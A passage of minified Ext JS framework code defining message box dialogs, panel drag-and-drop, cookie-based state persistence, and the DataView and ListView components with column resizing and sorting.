if (l.call(k || n, n) !== false) {
m.push(n)
}
}
return m
}, each:function (j, i) {
for (var k in g) {
if (g[k] && typeof g[k] != "function") {
if (j.call(i || g[k], g[k]) === false) {
return
}
}
}
}}
};
Ext.WindowMgr = new Ext.WindowGroup();
Ext.MessageBox = function () {
var u, b, q, t, h, l, s, a, n, p, j, g, r, v, o, i = "", d = "", m = ["ok", "yes", "no", "cancel"];
var c = function (x) {
r[x].blur();
if (u.isVisible()) {
u.hide();
w();
Ext.callback(b.fn, b.scope || window, [x, v.dom.value, b], 1)
}
};
var w = function () {
if (b && b.cls) {
u.el.removeClass(b.cls)
}
n.reset()
};
var e = function (z, x, y) {
if (b && b.closable !== false) {
u.hide();
w()
}
if (y) {
y.stopEvent()
}
};
var k = function (x) {
var z = 0, y;
if (!x) {
Ext.each(m, function (A) {
r[A].hide()
});
return z
}
u.footer.dom.style.display = "";
Ext.iterate(r, function (A, B) {
y = x[A];
if (y) {
B.show();
B.setText(Ext.isString(y) ? y : Ext.MessageBox.buttonText[A]);
z += B.getEl().getWidth() + 15
} else {
B.hide()
}
});
return z
};
return{getDialog:function (x) {
if (!u) {
var z = [];
r = {};
Ext.each(m, function (A) {
z.push(r[A] = new Ext.Button({text:this.buttonText[A], handler:c.createCallback(A), hideMode:"offsets"}))
}, this);
u = new Ext.Window({autoCreate:true, title:x, resizable:false, constrain:true, constrainHeader:true, minimizable:false, maximizable:false, stateful:false, modal:true, shim:true, buttonAlign:"center", width:400, height:100, minHeight:80, plain:true, footer:true, closable:true, close:function () {
if (b && b.buttons && b.buttons.no && !b.buttons.cancel) {
c("no")
} else {
c("cancel")
}
}, fbar:new Ext.Toolbar({items:z, enableOverflow:false})});
u.render(document.body);
u.getEl().addClass("x-window-dlg");
q = u.mask;
h = u.body.createChild({html:'<div class="ext-mb-icon"></div><div class="ext-mb-content"><span class="ext-mb-text"></span><br /><div class="ext-mb-fix-cursor"><input type="text" class="ext-mb-input" /><textarea class="ext-mb-textarea"></textarea></div></div>'});
j = Ext.get(h.dom.firstChild);
var y = h.dom.childNodes[1];
l = Ext.get(y.firstChild);
s = Ext.get(y.childNodes[2].firstChild);
s.enableDisplayMode();
s.addKeyListener([10, 13], function () {
if (u.isVisible() && b && b.buttons) {
if (b.buttons.ok) {
c("ok")
} else {
if (b.buttons.yes) {
c("yes")
}
}
}
});
a = Ext.get(y.childNodes[2].childNodes[1]);
a.enableDisplayMode();
n = new Ext.ProgressBar({renderTo:h});
h.createChild({cls:"x-clear"})
}
return u
}, updateText:function (A) {
if (!u.isVisible() && !b.width) {
u.setSize(this.maxWidth, 100)
}
l.update(A ? A + " " : " ");
var y = d != "" ? (j.getWidth() + j.getMargins("lr")) : 0, C = l.getWidth() + l.getMargins("lr"), z = u.getFrameWidth("lr"), B = u.body.getFrameWidth("lr"), x;
x = Math.max(Math.min(b.width || y + C + z + B, b.maxWidth || this.maxWidth), Math.max(b.minWidth || this.minWidth, o || 0));
if (b.prompt === true) {
v.setWidth(x - y - z - B)
}
if (b.progress === true || b.wait === true) {
n.setSize(x - y - z - B)
}
if (Ext.isIE && x == o) {
x += 4
}
l.update(A || " ");
u.setSize(x, "auto").center();
return this
}, updateProgress:function (y, x, z) {
n.updateProgress(y, x);
if (z) {
this.updateText(z)
}
return this
}, isVisible:function () {
return u && u.isVisible()
}, hide:function () {
var x = u ? u.activeGhost : null;
if (this.isVisible() || x) {
u.hide();
w();
if (x) {
u.unghost(false, false)
}
}
return this
}, show:function (A) {
if (this.isVisible()) {
this.hide()
}
b = A;
var B = this.getDialog(b.title || " ");
B.setTitle(b.title || " ");
var x = (b.closable !== false && b.progress !== true && b.wait !== true);
B.tools.close.setDisplayed(x);
v = s;
b.prompt = b.prompt || (b.multiline ? true : false);
if (b.prompt) {
if (b.multiline) {
s.hide();
a.show();
a.setHeight(Ext.isNumber(b.multiline) ? b.multiline : this.defaultTextHeight);
v = a
} else {
s.show();
a.hide()
}
} else {
s.hide();
a.hide()
}
v.dom.value = b.value || "";
if (b.prompt) {
B.focusEl = v
} else {
var z = b.buttons;
var y = null;
if (z && z.ok) {
y = r.ok
} else {
if (z && z.yes) {
y = r.yes
}
}
if (y) {
B.focusEl = y
}
}
if (Ext.isDefined(b.iconCls)) {
B.setIconClass(b.iconCls)
}
this.setIcon(Ext.isDefined(b.icon) ? b.icon : i);
o = k(b.buttons);
n.setVisible(b.progress === true || b.wait === true);
this.updateProgress(0, b.progressText);
this.updateText(b.msg);
if (b.cls) {
B.el.addClass(b.cls)
}
B.proxyDrag = b.proxyDrag === true;
B.modal = b.modal !== false;
B.mask = b.modal !== false ? q : false;
if (!B.isVisible()) {
document.body.appendChild(u.el.dom);
B.setAnimateTarget(b.animEl);
B.on("show", function () {
if (x === true) {
B.keyMap.enable()
} else {
B.keyMap.disable()
}
}, this, {single:true});
B.show(b.animEl)
}
if (b.wait === true) {
n.wait(b.waitConfig)
}
return this
}, setIcon:function (x) {
if (!u) {
i = x;
return
}
i = undefined;
if (x && x != "") {
j.removeClass("x-hidden");
j.replaceClass(d, x);
h.addClass("x-dlg-icon");
d = x
} else {
j.replaceClass(d, "x-hidden");
h.removeClass("x-dlg-icon");
d = ""
}
return this
}, progress:function (z, y, x) {
this.show({title:z, msg:y, buttons:false, progress:true, closable:false, minWidth:this.minProgressWidth, progressText:x});
return this
}, wait:function (z, y, x) {
this.show({title:y, msg:z, buttons:false, closable:false, wait:true, modal:true, minWidth:this.minProgressWidth, waitConfig:x});
return this
}, alert:function (A, z, y, x) {
this.show({title:A, msg:z, buttons:this.OK, fn:y, scope:x, minWidth:this.minWidth});
return this
}, confirm:function (A, z, y, x) {
this.show({title:A, msg:z, buttons:this.YESNO, fn:y, scope:x, icon:this.QUESTION, minWidth:this.minWidth});
return this
}, prompt:function (C, B, z, y, x, A) {
this.show({title:C, msg:B, buttons:this.OKCANCEL, fn:z, minWidth:this.minPromptWidth, scope:y, prompt:true, multiline:x, value:A});
return this
}, OK:{ok:true}, CANCEL:{cancel:true}, OKCANCEL:{ok:true, cancel:true}, YESNO:{yes:true, no:true}, YESNOCANCEL:{yes:true, no:true, cancel:true}, INFO:"ext-mb-info", WARNING:"ext-mb-warning", QUESTION:"ext-mb-question", ERROR:"ext-mb-error", defaultTextHeight:75, maxWidth:600, minWidth:100, minProgressWidth:250, minPromptWidth:250, buttonText:{ok:"OK", cancel:"Cancel", yes:"Yes", no:"No"}}
}();
Ext.Msg = Ext.MessageBox;
Ext.dd.PanelProxy = Ext.extend(Object, {constructor:function (a, b) {
this.panel = a;
this.id = this.panel.id + "-ddproxy";
Ext.apply(this, b)
}, insertProxy:true, setStatus:Ext.emptyFn, reset:Ext.emptyFn, update:Ext.emptyFn, stop:Ext.emptyFn, sync:Ext.emptyFn, getEl:function () {
return this.ghost
}, getGhost:function () {
return this.ghost
}, getProxy:function () {
return this.proxy
}, hide:function () {
if (this.ghost) {
if (this.proxy) {
this.proxy.remove();
delete this.proxy
}
this.panel.el.dom.style.display = "";
this.ghost.remove();
delete this.ghost
}
}, show:function () {
if (!this.ghost) {
this.ghost = this.panel.createGhost(this.panel.initialConfig.cls, undefined, Ext.getBody());
this.ghost.setXY(this.panel.el.getXY());
if (this.insertProxy) {
this.proxy = this.panel.el.insertSibling({cls:"x-panel-dd-spacer"});
this.proxy.setSize(this.panel.getSize())
}
this.panel.el.dom.style.display = "none"
}
}, repair:function (b, c, a) {
this.hide();
if (typeof c == "function") {
c.call(a || this)
}
}, moveProxy:function (a, b) {
if (this.proxy) {
a.insertBefore(this.proxy.dom, b)
}
}});
Ext.Panel.DD = Ext.extend(Ext.dd.DragSource, {constructor:function (b, a) {
this.panel = b;
this.dragData = {panel:b};
this.proxy = new Ext.dd.PanelProxy(b, a);
Ext.Panel.DD.superclass.constructor.call(this, b.el, a);
var d = b.header, c = b.body;
if (d) {
this.setHandleElId(d.id);
c = b.header
}
c.setStyle("cursor", "move");
this.scroll = false
}, showFrame:Ext.emptyFn, startDrag:Ext.emptyFn, b4StartDrag:function (a, b) {
this.proxy.show()
}, b4MouseDown:function (b) {
var a = b.getPageX(), c = b.getPageY();
this.autoOffset(a, c)
}, onInitDrag:function (a, b) {
this.onStartDrag(a, b);
return true
}, createFrame:Ext.emptyFn, getDragEl:function (a) {
return this.proxy.ghost.dom
}, endDrag:function (a) {
this.proxy.hide();
this.panel.saveState()
}, autoOffset:function (a, b) {
a -= this.startPageX;
b -= this.startPageY;
this.setDelta(a, b)
}});
Ext.state.Provider = Ext.extend(Ext.util.Observable, {constructor:function () {
this.addEvents("statechange");
this.state = {};
Ext.state.Provider.superclass.constructor.call(this)
}, get:function (b, a) {
return typeof this.state[b] == "undefined" ? a : this.state[b]
}, clear:function (a) {
delete this.state[a];
this.fireEvent("statechange", this, a, null)
}, set:function (a, b) {
this.state[a] = b;
this.fireEvent("statechange", this, a, b)
}, decodeValue:function (b) {
var e = /^(a|n|d|b|s|o|e)\:(.*)$/, h = e.exec(unescape(b)), d, c, a, g;
if (!h || !h[1]) {
return
}
c = h[1];
a = h[2];
switch (c) {
case"e":
return null;
case"n":
return parseFloat(a);
case"d":
return new Date(Date.parse(a));
case"b":
return(a == "1");
case"a":
d = [];
if (a != "") {
Ext.each(a.split("^"), function (i) {
d.push(this.decodeValue(i))
}, this)
}
return d;
case"o":
d = {};
if (a != "") {
Ext.each(a.split("^"), function (i) {
g = i.split("=");
d[g[0]] = this.decodeValue(g[1])
}, this)
}
return d;
default:
return a
}
}, encodeValue:function (c) {
var b, g = "", e = 0, a, d;
if (c == null) {
return"e:1"
} else {
if (typeof c == "number") {
b = "n:" + c
} else {
if (typeof c == "boolean") {
b = "b:" + (c ? "1" : "0")
} else {
if (Ext.isDate(c)) {
b = "d:" + c.toGMTString()
} else {
if (Ext.isArray(c)) {
for (a = c.length; e < a; e++) {
g += this.encodeValue(c[e]);
if (e != a - 1) {
g += "^"
}
}
b = "a:" + g
} else {
if (typeof c == "object") {
for (d in c) {
if (typeof c[d] != "function" && c[d] !== undefined) {
g += d + "=" + this.encodeValue(c[d]) + "^"
}
}
b = "o:" + g.substring(0, g.length - 1)
} else {
b = "s:" + c
}
}
}
}
}
}
return escape(b)
}});
Ext.state.Manager = function () {
var a = new Ext.state.Provider();
return{setProvider:function (b) {
a = b
}, get:function (c, b) {
return a.get(c, b)
}, set:function (b, c) {
a.set(b, c)
}, clear:function (b) {
a.clear(b)
}, getProvider:function () {
return a
}}
}();
Ext.state.CookieProvider = Ext.extend(Ext.state.Provider, {constructor:function (a) {
Ext.state.CookieProvider.superclass.constructor.call(this);
this.path = "/";
this.expires = new Date(new Date().getTime() + (1000 * 60 * 60 * 24 * 7));
this.domain = null;
this.secure = false;
Ext.apply(this, a);
this.state = this.readCookies()
}, set:function (a, b) {
if (typeof b == "undefined" || b === null) {
this.clear(a);
return
}
this.setCookie(a, b);
Ext.state.CookieProvider.superclass.set.call(this, a, b)
}, clear:function (a) {
this.clearCookie(a);
Ext.state.CookieProvider.superclass.clear.call(this, a)
}, readCookies:function () {
var d = {}, h = document.cookie + ";", b = /\s?(.*?)=(.*?);/g, g, a, e;
while ((g = b.exec(h)) != null) {
a = g[1];
e = g[2];
if (a && a.substring(0, 3) == "ys-") {
d[a.substr(3)] = this.decodeValue(e)
}
}
return d
}, setCookie:function (a, b) {
document.cookie = "ys-" + a + "=" + this.encodeValue(b) + ((this.expires == null) ? "" : ("; expires=" + this.expires.toGMTString())) + ((this.path == null) ? "" : ("; path=" + this.path)) + ((this.domain == null) ? "" : ("; domain=" + this.domain)) + ((this.secure == true) ? "; secure" : "")
}, clearCookie:function (a) {
document.cookie = "ys-" + a + "=null; expires=Thu, 01-Jan-70 00:00:01 GMT" + ((this.path == null) ? "" : ("; path=" + this.path)) + ((this.domain == null) ? "" : ("; domain=" + this.domain)) + ((this.secure == true) ? "; secure" : "")
}});
Ext.DataView = Ext.extend(Ext.BoxComponent, {selectedClass:"x-view-selected", emptyText:"", deferEmptyText:true, trackOver:false, blockRefresh:false, last:false, initComponent:function () {
Ext.DataView.superclass.initComponent.call(this);
if (Ext.isString(this.tpl) || Ext.isArray(this.tpl)) {
this.tpl = new Ext.XTemplate(this.tpl)
}
this.addEvents("beforeclick", "click", "mouseenter", "mouseleave", "containerclick", "dblclick", "contextmenu", "containercontextmenu", "selectionchange", "beforeselect");
this.store = Ext.StoreMgr.lookup(this.store);
this.all = new Ext.CompositeElementLite();
this.selected = new Ext.CompositeElementLite()
}, afterRender:function () {
Ext.DataView.superclass.afterRender.call(this);
this.mon(this.getTemplateTarget(), {click:this.onClick, dblclick:this.onDblClick, contextmenu:this.onContextMenu, scope:this});
if (this.overClass || this.trackOver) {
this.mon(this.getTemplateTarget(), {mouseover:this.onMouseOver, mouseout:this.onMouseOut, scope:this})
}
if (this.store) {
this.bindStore(this.store, true)
}
}, refresh:function () {
this.clearSelections(false, true);
var b = this.getTemplateTarget(), a = this.store.getRange();
b.update("");
if (a.length < 1) {
if (!this.deferEmptyText || this.hasSkippedEmptyText) {
b.update(this.emptyText)
}
this.all.clear()
} else {
this.tpl.overwrite(b, this.collectData(a, 0));
this.all.fill(Ext.query(this.itemSelector, b.dom));
this.updateIndexes(0)
}
this.hasSkippedEmptyText = true
}, getTemplateTarget:function () {
return this.el
}, prepareData:function (a) {
return a
}, collectData:function (b, e) {
var d = [], c = 0, a = b.length;
for (; c < a; c++) {
d[d.length] = this.prepareData(b[c].data, e + c, b[c])
}
return d
}, bufferRender:function (a, b) {
var c = document.createElement("div");
this.tpl.overwrite(c, this.collectData(a, b));
return Ext.query(this.itemSelector, c)
}, onUpdate:function (g, a) {
var b = this.store.indexOf(a);
if (b > -1) {
var e = this.isSelected(b), c = this.all.elements[b], d = this.bufferRender([a], b)[0];
this.all.replaceElement(b, d, true);
if (e) {
this.selected.replaceElement(c, d);
this.all.item(b).addClass(this.selectedClass)
}
this.updateIndexes(b, b)
}
}, onAdd:function (g, d, e) {
if (this.all.getCount() === 0) {
this.refresh();
return
}
var c = this.bufferRender(d, e), h, b = this.all.elements;
if (e < this.all.getCount()) {
h = this.all.item(e).insertSibling(c, "before", true);
b.splice.apply(b, [e, 0].concat(c))
} else {
h = this.all.last().insertSibling(c, "after", true);
b.push.apply(b, c)
}
this.updateIndexes(e)
}, onRemove:function (c, a, b) {
this.deselect(b);
this.all.removeElement(b, true);
this.updateIndexes(b);
if (this.store.getCount() === 0) {
this.refresh()
}
}, refreshNode:function (a) {
this.onUpdate(this.store, this.store.getAt(a))
}, updateIndexes:function (d, c) {
var b = this.all.elements;
d = d || 0;
c = c || ((c === 0) ? 0 : (b.length - 1));
for (var a = d; a <= c; a++) {
b[a].viewIndex = a
}
}, getStore:function () {
return this.store
}, bindStore:function (a, b) {
if (!b && this.store) {
if (a !== this.store && this.store.autoDestroy) {
this.store.destroy()
} else {
this.store.un("beforeload", this.onBeforeLoad, this);
this.store.un("datachanged", this.onDataChanged, this);
this.store.un("add", this.onAdd, this);
this.store.un("remove", this.onRemove, this);
this.store.un("update", this.onUpdate, this);
this.store.un("clear", this.refresh, this)
}
if (!a) {
this.store = null
}
}
if (a) {
a = Ext.StoreMgr.lookup(a);
a.on({scope:this, beforeload:this.onBeforeLoad, datachanged:this.onDataChanged, add:this.onAdd, remove:this.onRemove, update:this.onUpdate, clear:this.refresh})
}
this.store = a;
if (a) {
this.refresh()
}
}, onDataChanged:function () {
if (this.blockRefresh !== true) {
this.refresh.apply(this, arguments)
}
}, findItemFromChild:function (a) {
return Ext.fly(a).findParent(this.itemSelector, this.getTemplateTarget())
}, onClick:function (c) {
var b = c.getTarget(this.itemSelector, this.getTemplateTarget()), a;
if (b) {
a = this.indexOf(b);
if (this.onItemClick(b, a, c) !== false) {
this.fireEvent("click", this, a, b, c)
}
} else {
if (this.fireEvent("containerclick", this, c) !== false) {
this.onContainerClick(c)
}
}
}, onContainerClick:function (a) {
this.clearSelections()
}, onContextMenu:function (b) {
var a = b.getTarget(this.itemSelector, this.getTemplateTarget());
if (a) {
this.fireEvent("contextmenu", this, this.indexOf(a), a, b)
} else {
this.fireEvent("containercontextmenu", this, b)
}
}, onDblClick:function (b) {
var a = b.getTarget(this.itemSelector, this.getTemplateTarget());
if (a) {
this.fireEvent("dblclick", this, this.indexOf(a), a, b)
}
}, onMouseOver:function (b) {
var a = b.getTarget(this.itemSelector, this.getTemplateTarget());
if (a && a !== this.lastItem) {
this.lastItem = a;
Ext.fly(a).addClass(this.overClass);
this.fireEvent("mouseenter", this, this.indexOf(a), a, b)
}
}, onMouseOut:function (a) {
if (this.lastItem) {
if (!a.within(this.lastItem, true, true)) {
Ext.fly(this.lastItem).removeClass(this.overClass);
this.fireEvent("mouseleave", this, this.indexOf(this.lastItem), this.lastItem, a);
delete this.lastItem
}
}
}, onItemClick:function (b, a, c) {
if (this.fireEvent("beforeclick", this, a, b, c) === false) {
return false
}
if (this.multiSelect) {
this.doMultiSelection(b, a, c);
c.preventDefault()
} else {
if (this.singleSelect) {
this.doSingleSelection(b, a, c);
c.preventDefault()
}
}
return true
}, doSingleSelection:function (b, a, c) {
if (c.ctrlKey && this.isSelected(a)) {
this.deselect(a)
} else {
this.select(a, false)
}
}, doMultiSelection:function (c, a, d) {
if (d.shiftKey && this.last !== false) {
var b = this.last;
this.selectRange(b, a, d.ctrlKey);
this.last = b
} else {
if ((d.ctrlKey || this.simpleSelect) && this.isSelected(a)) {
this.deselect(a)
} else {
this.select(a, d.ctrlKey || d.shiftKey || this.simpleSelect)
}
}
}, getSelectionCount:function () {
return this.selected.getCount()
}, getSelectedNodes:function () {
return this.selected.elements
}, getSelectedIndexes:function () {
var b = [], d = this.selected.elements, c = 0, a = d.length;
for (; c < a; c++) {
b.push(d[c].viewIndex)
}
return b
}, getSelectedRecords:function () {
return this.getRecords(this.selected.elements)
}, getRecords:function (c) {
var b = [], d = 0, a = c.length;
for (; d < a; d++) {
b[b.length] = this.store.getAt(c[d].viewIndex)
}
return b
}, getRecord:function (a) {
return this.store.getAt(a.viewIndex)
}, clearSelections:function (a, b) {
if ((this.multiSelect || this.singleSelect) && this.selected.getCount() > 0) {
if (!b) {
this.selected.removeClass(this.selectedClass)
}
this.selected.clear();
this.last = false;
if (!a) {
this.fireEvent("selectionchange", this, this.selected.elements)
}
}
}, isSelected:function (a) {
return this.selected.contains(this.getNode(a))
}, deselect:function (a) {
if (this.isSelected(a)) {
a = this.getNode(a);
this.selected.removeElement(a);
if (this.last == a.viewIndex) {
this.last = false
}
Ext.fly(a).removeClass(this.selectedClass);
this.fireEvent("selectionchange", this, this.selected.elements)
}
}, select:function (d, g, b) {
if (Ext.isArray(d)) {
if (!g) {
this.clearSelections(true)
}
for (var c = 0, a = d.length; c < a; c++) {
this.select(d[c], true, true)
}
if (!b) {
this.fireEvent("selectionchange", this, this.selected.elements)
}
} else {
var e = this.getNode(d);
if (!g) {
this.clearSelections(true)
}
if (e && !this.isSelected(e)) {
if (this.fireEvent("beforeselect", this, e, this.selected.elements) !== false) {
Ext.fly(e).addClass(this.selectedClass);
this.selected.add(e);
this.last = e.viewIndex;
if (!b) {
this.fireEvent("selectionchange", this, this.selected.elements)
}
}
}
}
}, selectRange:function (c, a, b) {
if (!b) {
this.clearSelections(true)
}
this.select(this.getNodes(c, a), true)
}, getNode:function (b) {
if (Ext.isString(b)) {
return document.getElementById(b)
} else {
if (Ext.isNumber(b)) {
return this.all.elements[b]
} else {
if (b instanceof Ext.data.Record) {
var a = this.store.indexOf(b);
return this.all.elements[a]
}
}
}
return b
}, getNodes:function (e, a) {
var d = this.all.elements, b = [], c;
e = e || 0;
a = !Ext.isDefined(a) ? Math.max(d.length - 1, 0) : a;
if (e <= a) {
for (c = e; c <= a && d[c]; c++) {
b.push(d[c])
}
} else {
for (c = e; c >= a && d[c]; c--) {
b.push(d[c])
}
}
return b
}, indexOf:function (a) {
a = this.getNode(a);
if (Ext.isNumber(a.viewIndex)) {
return a.viewIndex
}
return this.all.indexOf(a)
}, onBeforeLoad:function () {
if (this.loadingText) {
this.clearSelections(false, true);
this.getTemplateTarget().update('<div class="loading-indicator">' + this.loadingText + "</div>");
this.all.clear()
}
}, onDestroy:function () {
this.all.clear();
this.selected.clear();
Ext.DataView.superclass.onDestroy.call(this);
this.bindStore(null)
}});
Ext.DataView.prototype.setStore = Ext.DataView.prototype.bindStore;
Ext.reg("dataview", Ext.DataView);
Ext.list.ListView = Ext.extend(Ext.DataView, {itemSelector:"dl", selectedClass:"x-list-selected", overClass:"x-list-over", scrollOffset:undefined, columnResize:true, columnSort:true, maxColumnWidth:Ext.isIE ? 99 : 100, initComponent:function () {
if (this.columnResize) {
this.colResizer = new Ext.list.ColumnResizer(this.colResizer);
this.colResizer.init(this)
}
if (this.columnSort) {
this.colSorter = new Ext.list.Sorter(this.columnSort);
this.colSorter.init(this)
}
if (!this.internalTpl) {
this.internalTpl = new Ext.XTemplate('<div class="x-list-header"><div class="x-list-header-inner">', '<tpl for="columns">', '<div style="width:{[values.width*100]}%;text-align:{align};"><em unselectable="on" id="', this.id, '-xlhd-{#}">', "{header}", "</em></div>", "</tpl>", '<div class="x-clear"></div>', "</div></div>", '<div class="x-list-body"><div class="x-list-body-inner">', "</div></div>")
}
if (!this.tpl) {
this.tpl = new Ext.XTemplate('<tpl for="rows">', "<dl>", '<tpl for="parent.columns">', '<dt style="width:{[values.width*100]}%;text-align:{align};">', '<em unselectable="on"<tpl if="cls"> class="{cls}</tpl>">', "{[values.tpl.apply(parent)]}", "</em></dt>", "</tpl>", '<div class="x-clear"></div>', "</dl>", "</tpl>")
}
var l = this.columns, h = 0, k = 0, m = l.length, b = [];
for (var g = 0; g < m; g++) {
var n = l[g];
if (!n.isColumn) {
n.xtype = n.xtype ? (/^lv/.test(n.xtype) ? n.xtype : "lv" + n.xtype) : "lvcolumn";
n = Ext.create(n)
}
if (n.width) {
h += n.width * 100;
if (h > this.maxColumnWidth) {
n.width -= (h - this.maxColumnWidth) / 100
}
k++
}
b.push(n)
}
l = this.columns = b;
if (k < m) {
var d = m - k;
if (h < this.maxColumnWidth) {
var a = ((this.maxColumnWidth - h) / d) / 100;
for (var e = 0; e < m; e++) {
var n = l[e];
if (!n.width) {
n.width = a
}
}
}
}
Ext.list.ListView.superclass.initComponent.call(this)
}, onRender:function () {
this.autoEl = {cls:"x-list-wrap"};
Ext.list.ListView.superclass.onRender.apply(this, arguments);
this.internalTpl.overwrite(this.el, {columns:this.columns});
this.innerBody = Ext.get(this.el.dom.childNodes[1].firstChild);
this.innerHd = Ext.get(this.el.dom.firstChild.firstChild);
if (this.hideHeaders) {
this.el.dom.firstChild.style.display = "none"
}
}, getTemplateTarget:function () {
return this.innerBody
}, collectData:function () {
var a = Ext.list.ListView.superclass.collectData.apply(this, arguments);
return{columns:this.columns, rows:a}
}, verifyInternalSize:function () {
if (this.lastSize) {
this.onResize(this.lastSize.width, this.lastSize.height)
}
}, onResize:function (c, e) {
var b = this.innerBody.dom, g = this.innerHd.dom, d = c - Ext.num(this.scrollOffset, Ext.getScrollBarWidth()) + "px", a;
if (!b) {
return
}
a = b.parentNode;
if (Ext.isNumber(c)) {
if (this.reserveScrollOffset || ((a.offsetWidth - a.clientWidth) > 10)) {
b.style.width = d;
g.style.width = d
} else {
b.style.width = c + "px";
g.style.width = c + "px";
setTimeout(function () {
if ((a.offsetWidth - a.clientWidth) > 10) {
b.style.width = d;
g.style.width = d
}
}, 10)
}
}
if (Ext.isNumber(e)) {
a.style.height = Math.max(0, e - g.parentNode.offsetHeight) + "px"
}
}, updateIndexes:function () {
Ext.list.ListView.superclass.updateIndexes.apply(this, arguments);
this.verifyInternalSize()
}, findHeaderIndex:function (g) {
g = g.dom || g;
var a = g.parentNode, d = a.parentNode.childNodes, b = 0, e;
for (; e = d[b]; b++) {
if (e == a) {
return b
}
}
return -1
}, setHdWidths:function () {
var d = this.innerHd.dom.getElementsByTagName("div"), c = 0, b = this.columns, a = b.length;
for (; c < a; c++) {
d[c].style.width = (b[c].width * 100) + "%"
}
}});
Ext.reg("listview", Ext.list.ListView);
Ext.ListView = Ext.list.ListView;
Ext.list.Column = Ext.extend(Object, {isColumn:true, align:"left", header:"", width:null, cls:"", constructor:function (a) {
if (!a.tpl) {
a.tpl = new Ext.XTemplate("{" + a.dataIndex + "}")
} else {
if (Ext.isString(a.tpl)) {
a.tpl = new Ext.XTemplate(a.tpl)
}
}
Ext.apply(this, a)
}});
Ext.reg("lvcolumn", Ext.list.Column);
Ext.list.NumberColumn = Ext.extend(Ext.list.Column, {format:"0,000.00", constructor:function (a) {
a.tpl = a.tpl || new Ext.XTemplate("{" + a.dataIndex + ':number("' + (a.format || this.format) + '")}');
Ext.list.NumberColumn.superclass.constructor.call(this, a)
}});
Ext.reg("lvnumbercolumn", Ext.list.NumberColumn);
Ext.list.DateColumn = Ext.extend(Ext.list.Column, {format:"m/d/Y", constructor:function (a) {
a.tpl = a.tpl || new Ext.XTemplate("{" + a.dataIndex + ':date("' + (a.format || this.format) + '")}');
Ext.list.DateColumn.superclass.constructor.call(this, a)
}});
Ext.reg("lvdatecolumn", Ext.list.DateColumn);
Ext.list.BooleanColumn = Ext.extend(Ext.list.Column, {trueText:"true", falseText:"false", undefinedText:" ", constructor:function (e) {
e.tpl = e.tpl || new Ext.XTemplate("{" + e.dataIndex + ":this.format}");
var b = this.trueText, d = this.falseText, a = this.undefinedText;
e.tpl.format = function (c) {
if (c === undefined) {
return a
}
if (!c || c === "false") {
return d
}
return b
};
Ext.list.DateColumn.superclass.constructor.call(this, e)
}});
Ext.reg("lvbooleancolumn", Ext.list.BooleanColumn);
Ext.list.ColumnResizer = Ext.extend(Ext.util.Observable, {minPct:0.05, constructor:function (a) {
Ext.apply(this, a);
Ext.list.ColumnResizer.superclass.constructor.call(this)
}, init:function (a) {
this.view = a;
a.on("render", this.initEvents, this)
}, initEvents:function (a) {
a.mon(a.innerHd, "mousemove", this.handleHdMove, this);
this.tracker = new Ext.dd.DragTracker({onBeforeStart:this.onBeforeStart.createDelegate(this), onStart:this.onStart.createDelegate(this), onDrag:this.onDrag.createDelegate(this), onEnd:this.onEnd.createDelegate(this), tolerance:3, autoStart:300});
this.tracker.initEl(a.innerHd);
a.on("beforedestroy", this.tracker.destroy, this.tracker)
}, handleHdMove:function (i, d) {
var c = 5, b = i.getPageX(), j = i.getTarget("em", 3, true);
if (j) {
var h = j.getRegion(), g = j.dom.style, a = j.dom.parentNode;
if (b - h.left <= c && a != a.parentNode.firstChild) {
this.activeHd = Ext.get(a.previousSibling.firstChild);
g.cursor = Ext.isWebKit ? "e-resize" : "col-resize"
} else {
if (h.right - b <= c && a != a.parentNode.lastChild.previousSibling) {
this.activeHd = j;
g.cursor = Ext.isWebKit ? "w-resize" : "col-resize"
} else {
delete this.activeHd;
g.cursor = ""
}
}
}
}, onBeforeStart:function (a) {
this.dragHd = this.activeHd;
return !!this.dragHd
}, onStart:function (g) {
var d = this, b = d.view, c = d.dragHd, a = d.tracker.getXY()[0];
d.proxy = b.el.createChild({cls:"x-list-resizer"});
d.dragX = c.getX();
d.headerIndex = b.findHeaderIndex(c);
d.headersDisabled = b.disableHeaders;
b.disableHeaders = true;
d.proxy.setHeight(b.el.getHeight());
d.proxy.setX(d.dragX);
d.proxy.setWidth(a - d.dragX);
this.setBoundaries()
}, setBoundaries:function (j) {
var k = this.view, h = this.headerIndex, c = k.innerHd.getWidth(), j = k.innerHd.getX(), b = Math.ceil(c * this.minPct), l = c - b, e = k.columns.length, d = k.innerHd.select("em", true), g = b + j, a = l + j, i;
if (e == 2) {
this.minX = g;
this.maxX = a
} else {
i = d.item(h + 2);
this.minX = d.item(h).getX() + b;
this.maxX = i ? i.getX() - b : a;
if (h == 0) {
this.minX = g
} else {
if (h == e - 2) {
this.maxX = a
}
}
}
}, onDrag:function (c) {
var b = this, a = b.tracker.getXY()[0].constrain(b.minX, b.maxX);
b.proxy.setWidth(a - this.dragX)
}, onEnd:function (i) {
var g = this.proxy.getWidth(), h = this.headerIndex, l = this.view, c = l.columns, b = l.innerHd.getWidth(), k = Math.ceil(g * l.maxColumnWidth / b) / 100, d = this.headersDisabled, m = c[h], j = c[h + 1], a = m.width + j.width;
this.proxy.remove();
m.width = k;
j.width = a - k;
delete this.dragHd;
l.setHdWidths();
l.refresh();
setTimeout(function () {
l.disableHeaders = d
}, 100)
}});
Ext.ListView.ColumnResizer = Ext.list.ColumnResizer;
Ext.list.Sorter = Ext.extend(Ext.util.Observable, {sortClasses:["sort-asc", "sort-desc"], constructor:function (a) {
Ext.apply(this, a);
Ext.list.Sorter.superclass.constructor.call(this)
}, init:function (a) {
this.view = a;
a.on("render", this.initEvents, this)
}, initEvents:function (a) {
a.mon(a.innerHd, "click", this.onHdClick, this);
a.innerHd.setStyle("cursor", "pointer");
a.mon(a.store, "datachanged", this.updateSortState, this);
this.updateSortState.defer(10, this, [a.store])
}, updateSortState:function (c) {
var g = c.getSortState();
if (!g) {
return
}
this.sortState = g;
var e = this.view.columns, h = -1;
for (var d = 0, a = e.length; d < a; d++) {
if (e[d].dataIndex == g.field) {
h = d;
break
}
}
if (h != -1) {
var b = g.direction;
this.updateSortIcon(h, b)
}
}, updateSortIcon:function (b, a) {
var d = this.sortClasses;
var c = this.view.innerHd.select("em").removeClass(d);
c.item(b).addClass(d[a == "DESC" ? 1 : 0])
}, onHdClick:function (c) {
var b = c.getTarget("em", 3);
if (b && !this.view.disableHeaders) {
var a = this.view.findHeaderIndex(b);
this.view.store.sort(this.view.columns[a].dataIndex)
}
}});
Ext.ListView.Sorter = Ext.list.Sorter;
